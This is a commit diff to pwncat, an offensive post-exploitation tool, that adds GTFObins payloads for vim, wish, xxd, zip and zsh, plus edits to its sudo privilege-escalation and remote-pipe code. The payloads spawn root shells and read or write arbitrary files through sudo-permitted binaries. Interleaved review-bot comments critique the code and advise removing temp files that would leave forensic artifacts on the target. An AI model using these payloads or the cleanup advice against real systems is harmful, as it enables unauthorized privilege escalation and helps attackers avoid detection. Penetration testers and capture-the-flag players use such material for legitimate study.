
Added new GTFObins

John Hammond 2020-05-23 03:06:19 -04:00
parent 76f83ea076
commit 72b83c88b2
6 changed files with 119 additions and 10 deletions


@ -874,8 +874,52 @@
//-------------------------------------------------------------------
"vim": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':!{shell}'", "-c", "'quit'"],
// Include an extra newline to be sure to exit vim itself.
"exit": "exit\n\n"
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':lua os.execute(\"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["-es" ,"'+%print'" ,"'+:q!'", "{lfile}"]
},
{
"type": "write",
"stream": "print",
"payload": "{command} >/dev/null",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"]
}
// Vim can PROBABLY file write... but I have not figured that out just yet.
],
//-------------------------------------------------------------------
"wish": [
{
"type": "shell",
"payload": "TF=none; {command} -h 2>/dev/null 1>&2; TF=$({mktemp}); echo 'exec {shell} <@stdin >@stdout 2>@stderr; exit' > $TF; {command}",
"args": ["$TF"]
}
],
//------------------------------------------------------------------- //-------------------------------------------------------------------
"xargs": [ "xargs": [
{ {
@ -890,5 +934,56 @@
"payload": "{command}", "payload": "{command}",
"args": ["-a", "{lfile}", "-0"] "args": ["-a", "{lfile}", "-0"]
} }
],
//-------------------------------------------------------------------
"xxd": [
{
"type": "read",
"stream": "raw",
"payload": "{command} {lfile} | {command} -r ",
"args": []
},
// This has the same issue of not sending the right length of the file.
{
"type": "write",
"stream": "raw",
"payload": "{xxd} -l {length} | {command}",
"args": ["-r", "-", "{lfile}"]
}
],
//-------------------------------------------------------------------
// `yum` should be added.
// https://gtfobins.github.io/gtfobins/yum/
//-------------------------------------------------------------------
"zip": [
{
"type": "shell",
"payload": "TF=none; {command} --help >/dev/null; TF=$({mktemp} -u); {command} $TF /etc/hosts -T -TT '{shell} #'",
"args": []
}
],
//-------------------------------------------------------------------
"zsh": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "\"{shell} -p\""]
}
] ]
//-------------------------------------------------------------------
// zsoelim was not yet tested because it might do strange things to the data
// https://gtfobins.github.io/gtfobins/zsoelim/
//
//-------------------------------------------------------------------
// zypper requires the modification of an environment variable.
// We don't handle this well in pwncat for sudo.
// https://gtfobins.github.io/gtfobins/zypper/
// "zypper": [
// {
// "type": "shell",
// "payload": "TF=none; {command} 2>/dev/null; TF=$({mktemp} -d); cp {shell} $TF/zypper-x; export PATH=$TF:$PATH; {command} x",
// "args": [],
// "exit": "exit\n"
// }
// ]
} }
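Review bot: The comment `// Vim can PROBABLY file write... but I have not figured that out just yet.` is now stale, because a `write` entry for vim (`-es '+%print' '+:w! {lfile}' '+:q!' /dev/stdin`) sits directly above it; replace it with the caveat a user of that entry actually needs, e.g. `// Note: vim rewrites the buffer on :w (line endings, trailing newline), so this write may not be byte-exact for binary data.` On the operational side, the `wish` and `zip` payloads create `$TF` on the target via `{mktemp}` and never remove it, and the `wish` script in particular leaves a file literally containing `exec {shell} ...` behind as a forensic artifact. If the `exit` string is sent to the same outer shell in which `TF` was assigned, `"exit": "exit\nrm -f $TF\n"` would clean it up; otherwise the removal belongs wherever pwncat tears the technique down. The `zip` entry also uses `{mktemp} -u`, which only prints a name without creating the file, so the archive path is predictable until zip creates it — fine for a GTFObins recipe, but worth a one-line comment so nobody "fixes" it into something that collides with zip's own create.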


@ -6,6 +6,12 @@ import socket
import sys import sys
from sqlalchemy.exc import InvalidRequestError from sqlalchemy.exc import InvalidRequestError
import warnings
from sqlalchemy import exc as sa_exc
# Ignore SQL Alchemy warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
import pwncat import pwncat
from pwncat.remote import Victim from pwncat.remote import Victim
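Review bot: The new `with warnings.catch_warnings():` block contains nothing but the `simplefilter` call, so the `ignore` filter is restored to its previous state the moment the block exits and the SQLAlchemy warnings it is meant to silence are not silenced; `import pwncat` is shown as an unchanged line, so it cannot have been moved under the `with` (the rendered page drops indentation, so this is inferred from the diff rather than seen). Either drop the context manager and call `warnings.simplefilter("ignore", category=sa_exc.SAWarning)` at module level, or indent the imports that actually trigger the warnings into the block. The comment should then state the intended scope, e.g. `# Suppress SQLAlchemy SAWarning noise for the rest of the process` versus `# ... only while importing pwncat's models`.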


@ -54,6 +54,7 @@ class RemoteBinaryPipe(RawIOBase):
# output of the user's terminal # output of the user's terminal
def close(self): def close(self):
if self.eof: if self.eof:
return return
@ -128,13 +129,16 @@ class RemoteBinaryPipe(RawIOBase):
pass pass
def write(self, data: bytes): def write(self, data: bytes):
if self.eof: if self.eof:
return None return None
try: try:
n = self.pty.client.send(data) n = self.pty.client.send(data)
except (socket.timeout, BlockingIOError): except (socket.timeout, BlockingIOError):
n = 0 n = 0
if n == 0: if n == 0:
return None return None
self.count += n self.count += n
return n return n


@ -3,7 +3,7 @@ from typing import Type, List, Tuple, Optional
from prompt_toolkit.shortcuts import confirm from prompt_toolkit.shortcuts import confirm
from colorama import Fore from colorama import Fore
import crypt import crypt
from time import sleep import time
import socket import socket
from pprint import pprint from pprint import pprint
import re import re
@ -278,9 +278,10 @@ class Finder:
try: try:
# Attempt our basic, known technique # Attempt our basic, known technique
exit_script = technique.method.execute(technique) exit_script = technique.method.execute(technique)
pwncat.victim.flush_output() pwncat.victim.flush_output(some=True)
# Reset the terminal to ensure we are stable # Reset the terminal to ensure we are stable
time.sleep(0.1)
pwncat.victim.reset() pwncat.victim.reset()
# Check that we actually succeeded # Check that we actually succeeded
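Review bot: The added `time.sleep(0.1)` between `flush_output(some=True)` and `pwncat.victim.reset()` is an unexplained fixed delay; on a high-latency session the technique's output can still be in flight when the reset sequence goes out, and on a fast one it is 100 ms of dead time per technique tried. At minimum the line needs a why-comment, e.g. `# Give the remote shell a moment to finish emitting the technique's output before the reset sequence is sent, otherwise the two interleave`; a bounded wait on the output actually draining would be more robust than a constant. Separately, `from time import sleep` was replaced with `import time`, so any remaining bare `sleep(...)` call elsewhere in this file would now raise NameError — the rest of the file is outside the hunk. The enclosing method of `Finder` starts and ends outside the hunk.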


@ -2,7 +2,7 @@
from typing import Generator, List, BinaryIO from typing import Generator, List, BinaryIO
import shlex import shlex
import sys import sys
from time import sleep import time
import os import os
from colorama import Fore, Style from colorama import Fore, Style
import socket import socket
@ -254,6 +254,8 @@ class SudoMethod(Method):
method, sudo_spec, need_password = technique.ident method, sudo_spec, need_password = technique.ident
# Build the payload # Build the payload
# The data size is WRONG for encoded payloads!!!
# ... but I guess this not applicable for `raw` streams..?
payload, input_data, exit_command = method.build( payload, input_data, exit_command = method.build(
lfile=filepath, spec=sudo_spec, user=technique.user, length=len(data) lfile=filepath, spec=sudo_spec, user=technique.user, length=len(data)
) )
@ -270,12 +272,11 @@ class SudoMethod(Method):
exit_cmd=exit_command.encode("utf-8"), exit_cmd=exit_command.encode("utf-8"),
) )
with method.wrap_stream(pipe) as pipe:
# Send the input data required to initiate the transfer # Send the input data required to initiate the transfer
if len(input_data) > 0: if len(input_data) > 0:
pipe.write(input_data.encode("utf-8")) pipe.write(input_data.encode("utf-8"))
with method.wrap_stream(pipe) as pipe:
pipe.write(data) pipe.write(data)
def get_name(self, tech: Technique): def get_name(self, tech: Technique):
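Review bot: `pipe.write(data)` discards its return value, but the `RemoteBinaryPipe.write` touched in this same commit returns the count from a single `send()` on a zero-timeout socket (and `None` when nothing was sent), so a short send silently truncates the file being written to the target unless `method.wrap_stream` returns a writer that loops internally — the wrapped pipe's type is not visible here. The write should loop until everything is sent and fail loudly on a zero/None result rather than spin; the rewrite below assumes `wrap_stream` preserves the short-write semantics of the raw pipe. The new comment `# The data size is WRONG for encoded payloads!!!` records a known defect without a path to fixing it; make it actionable, e.g. `# TODO: length=len(data) is the raw size; for encoded streams build() needs the encoded length`. The enclosing method of `SudoMethod` starts outside the hunk.
```python
        # … unchanged: method.build / pipe construction / input_data write …
        with method.wrap_stream(pipe) as pipe:
            remaining = data
            while remaining:
                sent = pipe.write(remaining)
                if not sent:
                    # 0/None means nothing went out this round; bail instead of spinning
                    raise OSError("short write while uploading payload data")
                remaining = remaining[sent:]
```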


@ -1328,6 +1328,8 @@ class Victim:
output = b"" output = b""
old_timeout = self.client.gettimeout() old_timeout = self.client.gettimeout()
self.client.settimeout(0) self.client.settimeout(0)
# self.client.send(b"echo\n")
# some = True
while True: while True:
try: try: